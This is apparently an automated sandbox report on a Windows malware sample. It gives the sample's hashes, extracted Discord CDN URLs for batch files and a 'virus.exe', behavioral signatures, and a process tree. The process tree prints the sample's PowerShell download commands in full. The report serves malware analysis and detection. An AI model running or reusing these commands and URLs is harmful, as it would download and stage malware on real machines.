Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
90s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
26/01/2024, 11:54
Static task
static1
Behavioral task
behavioral1
Sample
d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
Resource
win10v2004-20231215-en
General
-
Target
d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
-
Size
108KB
-
MD5
5a0002d2a22ceca62c674539b7454ae4
-
SHA1
8aebc5ca26daace2b5cef162500ffe515fc601e1
-
SHA256
f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762
-
SHA512
083792c1e199deaa86fde46b5b788c50a1b8a3b6bed4493d509aaa5d6c75fad4a631e64e0bc717ec13628d7fc3250d92566a12c934e6c04b1ac5452adbe573a7
-
SSDEEP
1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIflAmOHk1xJ:oq6+ouCpk2mpcWJ0r+QNTBfl9e
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe
Signatures
-
Blocklisted process makes network request 10 IoCs
flow pid Process 6 1160 powershell.exe 14 3432 powershell.exe 18 5000 powershell.exe 20 4092 powershell.exe 21 5016 powershell.exe 22 4344 powershell.exe 32 4608 powershell.exe 33 3432 powershell.exe 34 4316 powershell.exe 35 4964 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1160 powershell.exe 1160 powershell.exe 3432 powershell.exe 3432 powershell.exe 5000 powershell.exe 5000 powershell.exe 4092 powershell.exe 4092 powershell.exe 5016 powershell.exe 5016 powershell.exe 4344 powershell.exe 4344 powershell.exe 4344 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 3432 powershell.exe 3432 powershell.exe 3432 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3412 wrote to memory of 208 3412 d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe 86 PID 3412 wrote to memory of 208 3412 d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe 86 PID 208 wrote to memory of 1160 208 cmd.exe 91 PID 208 wrote to memory of 1160 208 cmd.exe 91 PID 208 wrote to memory of 3432 208 cmd.exe 105 PID 208 wrote to memory of 3432 208 cmd.exe 105 PID 208 wrote to memory of 5000 208 cmd.exe 93 PID 208 wrote to memory of 5000 208 cmd.exe 93 PID 208 wrote to memory of 4092 208 cmd.exe 96 PID 208 wrote to memory of 4092 208 cmd.exe 96 PID 208 wrote to memory of 5016 208 cmd.exe 99 PID 208 wrote to memory of 5016 208 cmd.exe 99 PID 208 wrote to memory of 4344 208 cmd.exe 101 PID 208 wrote to memory of 4344 208 cmd.exe 101 PID 208 wrote to memory of 4608 208 cmd.exe 104 PID 208 wrote to memory of 4608 208 cmd.exe 104 PID 208 wrote to memory of 3432 208 cmd.exe 105 PID 208 wrote to memory of 3432 208 cmd.exe 105 PID 208 wrote to memory of 4316 208 cmd.exe 106 PID 208 wrote to memory of 4316 208 cmd.exe 106 PID 208 wrote to memory of 4964 208 cmd.exe 107 PID 208 wrote to memory of 4964 208 cmd.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CD8.tmp\4CD9.tmp\4CDA.bat C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"3⤵PID:3432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5042b5a8a2e10f2223489f43a2e39d251
SHA1a4d41bae887b7c1b43bb461807bf446e0f3ea7cf
SHA256791ebac5c46c42b2e78cd87ce5a2a9d065da4aa7b15bc14ed795dfbc745b07d6
SHA512985e438a140d46917dcc5c4d306946bf6b3b01ca274ccaeb470633abf9628d4a615e9732b18c1a5deafeeb5d3d3b7a611a3f1011c60a699e017176a2637c8bd0
-
Filesize
1KB
MD58dd911a4927cea3092623071c52be8ec
SHA13020710472c1ad50f49b0dc6f99be0c14fae9ecb
SHA256dca719e362ccfc2de8123f56a339583cf3eef38a51848ba3c5a05bc4842f3cc2
SHA5121060ab744edc351118f893c812b16cf77e3595b6380782a6d4a89387959c707a44fc7c8ededc7aeed17c90902bea40447ab476f6fcc24171e6dd4d2f5981b3ce
-
Filesize
1KB
MD55f83651980b3f9a647f0b77e4c6b4033
SHA1d0dc9a515a9b1e6a62b31a9a702340ba069b49d9
SHA256da7976fc840b464f7ed489505c03c78b84e70246784d4233b5bdbc135989e81d
SHA51265e16a35897b93c21d05657a7fda17aaa0f7b0c089491cebf4d5207dbd61fcf20ef9ae733452f4747ec22a89b477e86af8b333bf796d14479f67640451c0e585
-
Filesize
1KB
MD59b0d0d79d0bbef03f6d943f6a8af8378
SHA1e3fb64a682ff88397cbc3f4a48057b5c638fad5d
SHA2569191424a02c75865d3c4af64b98ad85ededa47d09182101031cdcbe2fea69843
SHA512aae89565e6b6ac9508bfa08b1fda7ac6bc763737eeaa5d13a74e96791d8e75139991c5696ff94e784cf410b2536aa4f98791612d73461f01675dda8c18f2db0f
-
Filesize
1KB
MD569c5c09eff5cdd0c7ae3f07ac65c3fc4
SHA143e5f66ee2340fe9e4cf4340b7e231f7f6a52113
SHA256b0d23d64d7b2d0bebf3137b714e0ed9c410abc26f272742092f95ea9a8736ea6
SHA5122239a5ff837f104ac8328fc876d4ded7d9417f1a7da424456d3385329902b6ead4a5901be938f4fa657e2868fb99b3d93e55574bcc4e87559f24042bd7755194
-
Filesize
1KB
MD5fc806d8ebd4a398cd5dc4a313bc1588b
SHA10657bb80648a1e94571f70024ca81ddb0cbcca9c
SHA2563f0ecc204077e7236a0b91b31a1fa8189b22154020b4ad9852674887881b4fd5
SHA51249f1476dd8d09a3c808eb4ca4b57392b9b73e12ea63bc151d6a8361051947e0692225ecb6e137c3f9134dad05b6cd879d37fcf23b79f0a08646bc3b919078345
-
Filesize
1KB
MD5b0cfdab278bf3db6d14817b1e701e4ee
SHA17ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8
SHA2560554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854
SHA51240a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca
-
Filesize
18KB
MD5da14901fbd42e828503cc0f75847af52
SHA1db49087447161b0fc6ee882dfc6906d1a9d1b96e
SHA2568c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f
SHA5128e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82